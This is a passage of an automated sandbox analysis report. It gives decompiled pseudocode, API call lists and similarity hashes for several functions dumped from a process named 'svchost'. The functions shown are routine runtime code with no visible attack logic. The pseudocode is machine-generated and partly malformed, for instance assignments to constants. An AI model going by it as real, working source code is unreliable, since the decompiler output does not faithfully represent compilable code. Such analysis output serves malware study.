    • Instruction Fuzzy Hash: EC21D131148380ABD330FB14C856FAFB7A8AB94B20F104F1EB4A9662D2DBBC5005CB56
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E0048CDC2(intOrPtr __ecx, void* __eflags) {
    				void* _t35;
    				intOrPtr _t52;
    				void* _t54;
    
    				E00473304(E00490ED8, _t54);
    				_push(__ecx);
    				_t52 = __ecx;
    				 *((intOrPtr*)(_t54 - 0x10)) = __ecx;
    				E0048D28A(__ecx, __eflags);
    				 *((intOrPtr*)(__ecx)) = 0x49cd78;
    				 *((intOrPtr*)(_t54 - 4)) = 0;
    				if( *((intOrPtr*)(_t54 + 8)) == 0) {
    					 *((intOrPtr*)(__ecx + 0x78)) = 0;
    				} else {
    					 *((intOrPtr*)(_t52 + 0x78)) = E0047386B( *((intOrPtr*)(_t54 + 8)));
    				}
    				_t35 = E0048C6BF();
    				_t7 = _t35 + 0x1070; // 0x1070
    				 *((intOrPtr*)(E0048CC47(_t7, E0048C731) + 4)) = _t52;
    				 *((intOrPtr*)(_t52 + 0x28)) = GetCurrentThread();
    				 *((intOrPtr*)(_t52 + 0x2c)) = GetCurrentThreadId();
    				 *((intOrPtr*)(_t35 + 4)) = _t52;
    				 *((intOrPtr*)(_t52 + 0x68)) = 0;
    				 *((intOrPtr*)(_t52 + 0x8c)) = 0;
    				 *((intOrPtr*)(_t52 + 0x90)) = 0;
    				 *((intOrPtr*)(_t52 + 0x7c)) = 0;
    				 *((intOrPtr*)(_t52 + 0x88)) = 0;
    				 *((intOrPtr*)(_t52 + 0xa8)) = 0;
    				 *((intOrPtr*)(_t52 + 0x80)) = 0;
    				 *((short*)(_t52 + 0xb2)) = 0;
    				 *((short*)(_t52 + 0xb0)) = 0;
    				 *((intOrPtr*)(_t52 + 0x70)) = 0;
    				 *((intOrPtr*)(_t52 + 0xac)) = 0;
    				 *((intOrPtr*)(_t52 + 0xa0)) = 0;
    				 *((intOrPtr*)(_t52 + 0xa4)) = 0;
    				 *((intOrPtr*)(_t52 + 0x94)) = 0;
    				 *((intOrPtr*)(_t52 + 0x98)) = 0;
    				 *((intOrPtr*)(_t52 + 0xb4)) = 0;
    				 *((intOrPtr*)(_t52 + 0xbc)) = 0;
    				 *((intOrPtr*)(_t52 + 0x84)) = 0;
    				 *((intOrPtr*)(_t52 + 0xb8)) = 0x200;
    				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0xc));
    				return _t52;
    			}
    0x0048cdc7
    0x0048cdcc
    0x0048cdcf
    0x0048cdd2
    0x0048cdd5
    0x0048cddc
    0x0048cde5
    0x0048cde8
    0x0048cdf8
    0x0048cdea
    0x0048cdf3
    0x0048cdf3
    0x0048cdfb
    0x0048ce07
    0x0048ce12
    0x0048ce1b
    0x0048ce27
    0x0048ce2a
    0x0048ce2d
    0x0048ce30
    0x0048ce36
    0x0048ce3c
    0x0048ce3f
    0x0048ce45
    0x0048ce4b
    0x0048ce51
    0x0048ce58
    0x0048ce5f
    0x0048ce62
    0x0048ce68
    0x0048ce6e
    0x0048ce74
    0x0048ce7a
    0x0048ce80
    0x0048ce86
    0x0048ce8c
    0x0048ce92
    0x0048cea1
    0x0048cea9

    APIs
    • __EH_prolog.LIBCMT ref: 0048CDC7
      • Part of subcall function 0048D28A: __EH_prolog.LIBCMT ref: 0048D28F
    • GetCurrentThread.KERNEL32 ref: 0048CE15
    • GetCurrentThreadId.KERNEL32 ref: 0048CE1E
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CurrentH_prologThread
    • String ID: ^I
    • API String ID: 2095891121-3473481074
    • Opcode ID: 87e9697a5c5d8b2657309ca7fdaac71301fe91c991db0c1cf0d013cb1ae34a32
    • Instruction ID: 048fbadb8bf1421d6df2a7a591d955ce1f9ef7ca1d87a7db93d7e9a08d9132e3
    • Opcode Fuzzy Hash: 87e9697a5c5d8b2657309ca7fdaac71301fe91c991db0c1cf0d013cb1ae34a32
    • Instruction Fuzzy Hash: 8E21B0B0900B00DFD720AF2AC58179AFBE8FFA4300F10892FE5AA96621DBB46541CF55
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 16%
    			E0047EFF0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				intOrPtr _t20;
    
    				InterlockedIncrement(0x4e1c68);
    				_t20 =  *0x4e1c64; // 0x0
    				if(_t20 != 0) {
    					InterlockedDecrement(0x4e1c68);
    					E004774D4(0x13);
    					_push(1);
    					_pop(0);
    				}
    				_a12 = E0047F04D(_a4, _a8, _a12);
    				if(0 == 0) {
    					InterlockedDecrement(0x4e1c68);
    				} else {
    					E00477535(0x13);
    				}
    				return _a12;
    			}
    0x0047effc
    0x0047f00a
    0x0047f010
    0x0047f013
    0x0047f017
    0x0047f01d
    0x0047f01f
    0x0047f01f
    0x0047f031
    0x0047f036
    0x0047f043
    0x0047f038
    0x0047f03a
    0x0047f03f
    0x0047f04c

    APIs
    • InterlockedIncrement.KERNEL32(004E1C68), ref: 0047EFFC
    • InterlockedDecrement.KERNEL32(004E1C68), ref: 0047F013
      • Part of subcall function 004774D4: RtlInitializeCriticalSection.NTDLL(00000000), ref: 00477511
      • Part of subcall function 004774D4: RtlEnterCriticalSection.NTDLL(?), ref: 0047752C
    • InterlockedDecrement.KERNEL32(004E1C68), ref: 0047F043
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Interlocked$CriticalDecrementSection$EnterIncrementInitialize
    • String ID: $G
    • API String ID: 2038102319-4251033865
    • Opcode ID: fe310b87200f6335aa964317a5f483a811007d279342a33144b0d17023456f8d
    • Instruction ID: aedaaf6b50b4282826779a4088c432ce41799ab6089677abb8ff0e01e7dabbe2
    • Opcode Fuzzy Hash: fe310b87200f6335aa964317a5f483a811007d279342a33144b0d17023456f8d
    • Instruction Fuzzy Hash: 75F0593214038ABFDB112FA1AC85DEF3758EF55324F00803BFA0845222CBB99905C6ED
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00486D3D(void* __ecx, char _a4) {
    				void* __edi;
    				struct HRSRC__* _t6;
    				void* _t7;
    				void* _t10;
    				void* _t13;
    				struct HINSTANCE__* _t14;
    
    				_t13 = 0;
    				_t10 = __ecx;
    				if(_a4 == 0) {
    					L5:
    					return E00486D8D(_t10, _t13, _t13);
    				}
    				_t14 =  *(E0048C6BF() + 0xc);
    				_t3 =  &_a4; // 0x422723
    				_t6 = FindResourceA(_t14,  *_t3, 0xf0);
    				if(_t6 == 0) {
    					goto L5;
    				}
    				_t7 = LoadResource(_t14, _t6);
    				if(_t7 != 0) {
    					_t13 = LockResource(_t7);
    					goto L5;
    				}
    				return 0;
    			}
    0x00486d40
    0x00486d46
    0x00486d48
    0x00486d7f
    0x00000000
    0x00486d82
    0x00486d4f
    0x00486d57
    0x00486d5c
    0x00486d64
    0x00000000
    0x00000000
    0x00486d68
    0x00486d70
    0x00486d7d
    0x00000000
    0x00486d7d
    0x00000000

    APIs
    • FindResourceA.KERNEL32(?,#'B,000000F0), ref: 00486D5C
    • LoadResource.KERNEL32(?,00000000,?,?,?,0048461A,?,?,00422723), ref: 00486D68
    • LockResource.KERNEL32(00000000,?,?,?,0048461A,?,?,00422723), ref: 00486D77
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Resource$FindLoadLock
    • String ID: #'B
    • API String ID: 2752051264-2271064946
    • Opcode ID: 2ed60adfe24fe4189b3203dd96297275d969be9fd8784dd3b5a667122052657b
    • Instruction ID: 42a326d73d8ace7ea1889e7075cff5908f208a5bd6f4f577a614dfd5ab42c14e
    • Opcode Fuzzy Hash: 2ed60adfe24fe4189b3203dd96297275d969be9fd8784dd3b5a667122052657b
    • Instruction Fuzzy Hash: DEE0ED32304541AB8A513B715C48C2FB2AEEFE0362B160D3BF101D2220CB788C0197BA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E0048A70B(struct HWND__* _a4, intOrPtr _a8) {
    				char _v16;
    				signed int _t13;
    
    				if(_a4 == 0 || (GetWindowLongA(_a4, 0xfffffff0) & 0x0000000f) != _a8) {
    					return 0;
    				} else {
    					GetClassNameA(_a4,  &_v16, 0xa);
    					_t13 =  *0x4921fc( &_v16, "combobox");
    					asm("sbb eax, eax");
    					return  ~_t13 + 1;
    				}
    			}
    0x0048a715
    0x00000000
    0x0048a72e
    0x0048a737
    0x0048a746
    0x0048a74e
    0x00000000
    0x0048a750

    APIs
    • GetWindowLongA.USER32(00000000,000000F0), ref: 0048A71C
    • GetClassNameA.USER32(00000000,?,0000000A), ref: 0048A737
    • lstrcmpi.KERNEL32(?,combobox), ref: 0048A746
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ClassLongNameWindowlstrcmpi
    • String ID: combobox
    • API String ID: 2054663530-2240613097
    • Opcode ID: 1c89f458abd8a8783c90dcbfcca51aaaf6779af9c7ad10fd8bbccabddddfb23b
    • Instruction ID: 1b6b0dd0a1dfb06d7dab1ab4bad5f60124974abc731d42ffd47c67d457a6de76
    • Opcode Fuzzy Hash: 1c89f458abd8a8783c90dcbfcca51aaaf6779af9c7ad10fd8bbccabddddfb23b
    • Instruction Fuzzy Hash: 1BE0A031990109BFCF00AB30CC4AA9D3B78EB10346F108633F513D5090D6B4D618D74A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E0047504A() {
    				signed int _v12;
    				signed long long _v20;
    				signed long long _v28;
    				void* _t10;
    				struct HINSTANCE__* _t19;
    
    				_t19 = GetModuleHandleA("KERNEL32");
    				if(_t19 == 0) {
    					L6:
    					_v12 =  *0x49dc38;
    					_v20 =  *0x49dc30;
    					asm("fsubr qword [ebp-0x10]");
    					_v28 = _v20 / _v12 * _v12;
    					asm("fcomp qword [0x49d708]");
    					asm("fnstsw ax");
    					asm("sahf");
    					if(_t19 <= 0) {
    						return 0;
    					} else {
    						_t10 = 1;
    						return _t10;
    					}
    				} else {
    					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
    					if(__eax == 0) {
    						goto L6;
    					} else {
    						_push(0);
    						return __eax;
    					}
    				}
    			}
    0x00475055
    0x00475057
    0x0047506e
    0x00475018
    0x00475021
    0x0047502d
    0x00475030
    0x00475036
    0x0047503c
    0x0047503e
    0x0047503f
    0x00475049
    0x00475041
    0x00475043
    0x00475045
    0x00475045
    0x00475059
    0x0047505f
    0x00475067
    0x00000000
    0x00475069
    0x00475069
    0x0047506d
    0x0047506d
    0x00475067

    APIs
    • GetModuleHandleA.KERNEL32(KERNEL32,0046FEB7), ref: 0047504F
    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0047505F
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: IsProcessorFeaturePresent$KERNEL32
    • API String ID: 1646373207-3105848591
    • Opcode ID: df08a1f1b1451f35a8f91960e3785a0ece15d8066fab911b321486c4c17c9a15
    • Instruction ID: 5f9fd47c60502495a38e670b5bc96f9c7f14d2580cc4e3d54d0c3d1a5891e2ee
    • Opcode Fuzzy Hash: df08a1f1b1451f35a8f91960e3785a0ece15d8066fab911b321486c4c17c9a15
    • Instruction Fuzzy Hash: 4DC01220784740A2EE301BB20F09F6B2A58AB40B42F18883BA809F8180CADDC000E0AE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E00481077(intOrPtr* __ecx, void* __edx, signed char* _a4, char _a8) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v14;
    				signed int _v16;
    				intOrPtr* _v20;
    				char _v24;
    				void* _v36;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t72;
    				signed char _t75;
    				signed int _t76;
    				signed char _t77;
    				signed int _t78;
    				signed int _t80;
    				signed int _t83;
    				signed int _t84;
    				signed int _t86;
    				signed int _t87;
    				signed char _t88;
    				signed int _t89;
    				signed int _t90;
    				signed int _t92;
    				signed int _t93;
    				signed int _t94;
    				signed int _t96;
    				signed int _t97;
    				signed int _t98;
    				signed int _t99;
    				signed int _t100;
    				signed int _t101;
    				signed int _t108;
    				signed int _t109;
    				signed int _t111;
    				signed int _t112;
    				signed int _t114;
    				signed int _t115;
    				signed int _t116;
    				signed int _t117;
    				signed int _t118;
    				signed int _t120;
    				signed int _t122;
    				signed int _t123;
    				signed int _t126;
    				signed int _t127;
    				signed int _t129;
    				signed char* _t130;
    				signed char* _t135;
    				signed int _t141;
    				void* _t148;
    				void* _t149;
    				void* _t152;
    				void* _t153;
    				void* _t157;
    				signed char* _t159;
    				signed int _t164;
    				void* _t166;
    				long long* _t167;
    
    				_t157 = __edx;
    				_v12 = _v12 & 0x00000000;
    				_t159 = _a4;
    				_v20 = __ecx;
    				_v24 = _a8;
    				while( *_t159 != 0) {
    					if( *_t159 != 0x25) {
    						L90:
    						_t72 = E0047342F(_t159);
    						_t61 =  &_v12;
    						 *_t61 = _v12 + _t72;
    						__eflags =  *_t61;
    						L91:
    						_t159 = E00473418(_t159);
    						continue;
    					}
    					_t159 = E00473418(_t159);
    					_pop(_t148);
    					_t75 =  *_t159;
    					if(_t75 == 0x25) {
    						goto L90;
    					}
    					_t164 = 0;
    					_v8 = 0;
    					if(_t75 == 0) {
    						L15:
    						_t76 = E004709B8(_t148, _t159);
    						_pop(_t149);
    						_v8 = _t76;
    						while(1) {
    							_t77 =  *_t159;
    							if(_t77 == 0) {
    								break;
    							}
    							_push(_t77);
    							if(E00472F1E(_t149, _t159, _t164) == 0) {
    								break;
    							}
    							_t135 = E00473418(_t159);
    							_pop(_t149);
    							_t159 = _t135;
    						}
    						L19:
    						_t141 = 0;
    						__eflags =  *_t159 - 0x2e;
    						if( *_t159 != 0x2e) {
    							L22:
    							_v16 = _v16 & 0x00000000;
    							_t78 = E004713BF(_t159, "I64", 3);
    							_t167 = _t167 + 0xc;
    							__eflags = _t78;
    							if(_t78 != 0) {
    								_t80 =  *_t159 - 0x46;
    								__eflags = _t80;
    								if(_t80 == 0) {
    									L35:
    									_t159 = E00473418(_t159);
    									L36:
    									_t83 =  *_t159 | _v16;
    									__eflags = _t83 - 0x10063;
    									if(__eflags > 0) {
    										_t84 = _t83 - 0x10073;
    										__eflags = _t84;
    										if(_t84 == 0) {
    											L61:
    											_a8 = _a8 + 4;
    											_t86 =  *(_a8 - 4);
    											__eflags = _t86;
    											if(_t86 != 0) {
    												_t87 =  *0x4922a0(_t86);
    												L64:
    												_t164 = _t87;
    												__eflags = _t164 - 1;
    												if(_t164 < 1) {
    													_t164 = 1;
    												}
    												__eflags = _t164;
    												if(_t164 == 0) {
    													L44:
    													_t88 =  *_t159;
    													__eflags = _t88 - 0x69;
    													if(__eflags > 0) {
    														_t89 = _t88 - 0x6e;
    														__eflags = _t89;
    														if(_t89 == 0) {
    															_t57 =  &_a8;
    															 *_t57 = _a8 + 4;
    															__eflags =  *_t57;
    															goto L89;
    														}
    														_t90 = _t89 - 1;
    														__eflags = _t90;
    														if(_t90 == 0) {
    															L86:
    															__eflags = _v14 & 0x00000004;
    															if((_v14 & 0x00000004) == 0) {
    																L82:
    																_t49 =  &_a8;
    																 *_t49 = _a8 + 4;
    																__eflags =  *_t49;
    																L83:
    																_t164 = 0x20;
    																L84:
    																_t92 = _v8 + _t141;
    																__eflags = _t92 - _t164;
    																if(_t92 < _t164) {
    																	goto L89;
    																}
    																L85:
    																_t164 = _t92;
    																goto L89;
    															}
    															_a8 = _a8 + 8;
    															goto L83;
    														}
    														_t93 = _t90 - 1;
    														__eflags = _t93;
    														if(_t93 == 0) {
    															goto L82;
    														}
    														_t94 = _t93 - 5;
    														__eflags = _t94;
    														if(_t94 == 0) {
    															goto L86;
    														}
    														__eflags = _t94 == 3;
    														if(_t94 == 3) {
    															goto L86;
    														}
    														goto L89;
    													}
    													if(__eflags == 0) {
    														goto L86;
    													}
    													_t96 = _t88 - 0x47;
    													__eflags = _t96;
    													if(_t96 == 0) {
    														L75:
    														_a8 = _a8 + 8;
    														_t164 = 0x80;
    														goto L84;
    													}
    													_t97 = _t96 - 0x11;
    													__eflags = _t97;
    													if(_t97 == 0) {
    														goto L86;
    													}
    													_t98 = _t97 - 0xc;
    													__eflags = _t98;
    													if(_t98 == 0) {
    														goto L86;
    													}
    													_t99 = _t98 - 1;
    													__eflags = _t99;
    													if(_t99 == 0) {
    														goto L75;
    													}
    													_t100 = _t99 - 1;
    													__eflags = _t100;
    													if(_t100 == 0) {
    														_t39 = _t141 + 0x13e; // 0x13e
    														_t101 = _t39;
    														__eflags = _v8 - _t101;
    														if(_v8 > _t101) {
    															_t101 = _v8;
    														}
    														E00471390(_t101 + 0x00000003 & 0x000000fc, 0x10063);
    														_a8 = _a8 + 8;
    														_push(0x10063);
    														_push(0x10063);
    														 *_t167 =  *((long long*)(_a8 - 8));
    														_push(_t141 + 6);
    														E0047262F(_t157, _t167, "%*.*f", _v8);
    														_t92 = E00473450(_t167);
    														_t167 = _t167 + 0x1c;
    														goto L85;
    													}
    													__eflags = _t100 == 1;
    													if(_t100 == 1) {
    														goto L75;
    													}
    													goto L89;
    												} else {
    													L67:
    													__eflags = _t141;
    													if(_t141 != 0) {
    														__eflags = _t164 - _t141;
    														if(_t164 >= _t141) {
    															_t164 = _t141;
    														}
    													}
    													__eflags = _t164 - _v8;
    													if(_t164 <= _v8) {
    														_t164 = _v8;
    													}
    													L89:
    													_v12 = _v12 + _t164;
    													goto L91;
    												}
    											}
    											L62:
    											_t164 = 6;
    											goto L67;
    										}
    										_t108 = _t84 - 0xffd0;
    										__eflags = _t108;
    										if(_t108 == 0) {
    											L60:
    											_a8 = _a8 + 4;
    											_t164 = 2;
    											goto L67;
    										}
    										_t109 = _t108 - 0x10;
    										__eflags = _t109;
    										if(_t109 == 0) {
    											L58:
    											_a8 = _a8 + 4;
    											_t111 =  *(_a8 - 4);
    											__eflags = _t111;
    											if(_t111 == 0) {
    												goto L62;
    											}
    											_t87 = E004732E5(_t111);
    											_pop(0x10063);
    											goto L64;
    										}
    										_t112 = _t109 - 0x10;
    										__eflags = _t112;
    										if(_t112 == 0) {
    											goto L60;
    										}
    										__eflags = _t112 != 0x10;
    										if(_t112 != 0x10) {
    											goto L44;
    										}
    										goto L58;
    									}
    									if(__eflags == 0) {
    										goto L60;
    									}
    									_t114 = _t83 - 0x43;
    									__eflags = _t114;
    									if(_t114 == 0) {
    										goto L60;
    									}
    									0x10063 = 0x10;
    									_t115 = _t114 - 0x10063;
    									__eflags = _t115;
    									if(_t115 == 0) {
    										goto L58;
    									}
    									_t116 = _t115 - 0x10063;
    									__eflags = _t116;
    									if(_t116 == 0) {
    										goto L60;
    									}
    									_t117 = _t116 - 0x10063;
    									__eflags = _t117;
    									if(_t117 == 0) {
    										goto L61;
    									}
    									_t118 = _t117 - 0xffd0;
    									__eflags = _t118;
    									if(_t118 == 0) {
    										goto L60;
    									}
    									__eflags = _t118 == 0x10063;
    									if(_t118 == 0x10063) {
    										goto L61;
    									}
    									goto L44;
    								}
    								_t120 = _t80 - 6;
    								__eflags = _t120;
    								if(_t120 == 0) {
    									goto L35;
    								}
    								_t122 = _t120;
    								__eflags = _t122;
    								if(_t122 == 0) {
    									goto L35;
    								}
    								_t123 = _t122 - 0x1a;
    								__eflags = _t123;
    								if(_t123 == 0) {
    									_v16 = 0x10000;
    									goto L35;
    								}
    								__eflags = _t123 != 4;
    								if(_t123 != 4) {
    									goto L36;
    								}
    								_v16 = 0x20000;
    								goto L35;
    							}
    							_t159 =  &(_t159[3]);
    							_v16 = 0x40000;
    							goto L36;
    						}
    						_t159 = E00473418(_t159);
    						_pop(_t152);
    						__eflags =  *_t159 - 0x2a;
    						if( *_t159 != 0x2a) {
    							_t126 = E004709B8(_t152, _t159);
    							_pop(_t153);
    							_t141 = _t126;
    							while(1) {
    								_t127 =  *_t159;
    								__eflags = _t127;
    								if(_t127 == 0) {
    									goto L22;
    								}
    								_push(_t127);
    								_t129 = E00472F1E(_t153, _t159, _t164);
    								__eflags = _t129;
    								if(_t129 == 0) {
    									goto L22;
    								}
    								_t130 = E00473418(_t159);
    								_pop(_t153);
    								_t159 = _t130;
    							}
    							goto L22;
    						}
    						_t17 =  &_a8;
    						 *_t17 = _a8 + 4;
    						__eflags =  *_t17;
    						_t141 =  *(_a8 - 4);
    						_t159 = E00473418(_t159);
    						goto L22;
    					} else {
    						goto L5;
    					}
    					do {
    						L5:
    						if(_t75 != 0x23) {
    							__eflags = _t75 - 0x2a;
    							if(_t75 != 0x2a) {
    								__eflags = _t75 - 0x2d;
    								if(_t75 == 0x2d) {
    									goto L13;
    								}
    								__eflags = _t75 - 0x2b;
    								if(_t75 == 0x2b) {
    									goto L13;
    								}
    								__eflags = _t75 - 0x30;
    								if(_t75 == 0x30) {
    									goto L13;
    								}
    								__eflags = _t75 - 0x20;
    								if(_t75 != 0x20) {
    									break;
    								}
    								goto L13;
    							}
    							_a8 = _a8 + 4;
    							_v8 =  *(_a8 - 4);
    						} else {
    							_v12 = _v12 + 2;
    						}
    						L13:
    						_t159 = E00473418(_t159);
    						_pop(_t148);
    						_t75 =  *_t159;
    					} while (_t75 != 0);
    					if(_v8 != _t164) {
    						goto L19;
    					}
    					goto L15;
    				}
    				E004836A6(_v20, _t166, _v12);
    				E00472AEA(_t157,  *_v20, _a4, _v24);
    				return E004836F5(_v20, __eflags, 0xffffffff);
    			}
    0x00481077
    0x00481080
    0x00481087
    0x0048108a
    0x0048108d
    0x00481090
    0x0048109c
    0x0048137c
    0x0048137d
    0x00481382
    0x00481382
    0x00481382
    0x00481386
    0x0048138d
    0x00000000
    0x0048138d
    0x004810a8
    0x004810aa
    0x004810ab
    0x004810af
    0x00000000
    0x00000000
    0x004810b5
    0x004810b9
    0x004810bc
    0x004810ff
    0x00481100
    0x00481105
    0x00481106
    0x00481109
    0x00481109
    0x0048110d
    0x00000000
    0x00000000
    0x00481112
    0x0048111b
    0x00000000
    0x00000000
    0x0048111e
    0x00481123
    0x00481124
    0x00481124
    0x00481128
    0x00481128
    0x0048112a
    0x0048112d
    0x00481150
    0x00481150
    0x0048115c
    0x00481161
    0x00481164
    0x00481166
    0x0048119f
    0x0048119f
    0x004811a2
    0x004811c7
    0x004811ce
    0x004811d0
    0x004811d3
    0x004811db
    0x004811dd
    0x00481267
    0x00481267
    0x0048126c
    0x004812a4
    0x004812a4
    0x004812ab
    0x004812ae
    0x004812b0
    0x004812b8
    0x004812be
    0x004812be
    0x004812c0
    0x004812c3
    0x004812c7
    0x004812c7
    0x004812c8
    0x004812ca
    0x00481220
    0x00481220
    0x00481223
    0x00481226
    0x0048133c
    0x0048133c
    0x0048133f
    0x00481373
    0x00481373
    0x00481373
    0x00000000
    0x00481373
    0x00481341
    0x00481341
    0x00481342
    0x00481367
    0x00481367
    0x0048136b
    0x00481353
    0x00481353
    0x00481353
    0x00481353
    0x00481357
    0x00481359
    0x0048135a
    0x0048135d
    0x0048135f
    0x00481361
    0x00000000
    0x00000000
    0x00481363
    0x00481363
    0x00000000
    0x00481363
    0x0048136d
    0x00000000
    0x0048136d
    0x00481344
    0x00481344
    0x00481345
    0x00000000
    0x00000000
    0x00481347
    0x00481347
    0x0048134a
    0x00000000
    0x00000000
    0x0048134c
    0x0048134f
    0x00000000
    0x00000000
    0x00000000
    0x00481351
    0x0048122c
    0x00000000
    0x00000000
    0x00481232
    0x00481232
    0x00481235
    0x00481331
    0x00481331
    0x00481335
    0x00000000
    0x00481335
